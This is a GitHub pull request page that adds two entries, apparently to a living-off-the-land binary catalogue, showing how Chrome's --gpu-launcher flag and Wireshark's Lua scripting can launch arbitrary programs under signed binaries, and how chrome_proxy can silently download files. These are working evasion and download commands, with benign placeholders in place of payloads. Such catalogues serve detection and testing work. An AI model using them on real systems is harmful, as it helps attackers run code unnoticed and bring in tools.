Skip to content

Create GoogleChrome.yml #23

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Miragle-Hub wants to merge 2 commits into
base: main
Choose a base branch
from
Open

Create GoogleChrome.yml #23

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
73a553d
Create GoogleChrome.yml
Miragle-Hub Jul 21, 2023
011daed
Create wireshark.yml
Miragle-Hub Jul 26, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
36 changes: 36 additions & 0 deletions yml/Desktop_App/GoogleChrome.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
---
Name: Google Chrome
Description: Google Chrome is a cross-platform web browser developed by Google.
Author: 'Mirage'
Created: 2023-07-17

Category: Execution
Privileges: User
MitreID: T1204
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Google\Chrome\Application\chrome.exe' --silent-launch --disable-gpu-sandbox --gpu-launcher="calc.exe"

& 'C:\Program Files\Google\Chrome\Application\chrome_proxy.exe' --silent-launch --disable-gpu-sandbox --gpu-launcher="calc.exe"

Use case: Chrome spawns calc.exe as a child process of chrome.exe/chrome_proxy.exe and executes the ping command or execute a binary. Executes a process under a non suspicious signed binary.
Resources:
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Execution/Execution%20of%20binary%20using%20chrome

Category: Download File from internet
Privileges: User
MitreID: T1105 Ingress Tool Transfer
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Google\Chrome\Application\chrome_proxy.exe' --profile-directory=Default --incognito --chrome-frame --user-data-dir="C:\Temp\Temp-chrome\" --window-size=0,0 --window-position="0000,1000" <URL>

Use case: The script opens Google Chrome in a minimized window and allows it to download files from the internet without requiring much user intervention. Ensure the creation of a specific directory mentioned in "--user-data-dir" to establish a new profile data.
Resources:
https://medium.com/@mirag3/exploring-alternative-methods-chrome-based-binary-execution-and-file-download-40e9a46ebc59
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Lateral%20Movement%20/DownloadFileChrome_proxy.exe

Acknowledgement:
- Person: @miragle-hub

34 changes: 34 additions & 0 deletions yml/Desktop_App/wireshark.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
---
Name: Wireshark
Description: Wireshark is a free and open-source packet analyzer.
Author: 'Mirage'
Created: 2023-07-17

Category: Execution
Privileges: User
MitreID: T1218
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Wireshark\tshark.exe' -X lua_script:'<path of lua script>'
& 'C:\Program Files\Wireshark\wireshark.exe' -X lua_script:'<path of lua script>' (Wireshark also opens while executing)

lua file content
-- mention the binary that needs to be executed
os.execute('C:\\Windows\\notepad.exe')

Use case: Wireshark spawns notepad.exe as a child process of wireshark.exe. Executes a process under a non suspicious signed binary.
Resources:
https://www.youtube.com/watch?v=iMgIp3DVFTA
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Execution/Wireshark


Acknowledgement:
- Person:
Ali Mosajjal @mosajjal
Diljith Suresh @diljith369
Patrick Dong @superpb9
Mirage @mirage

---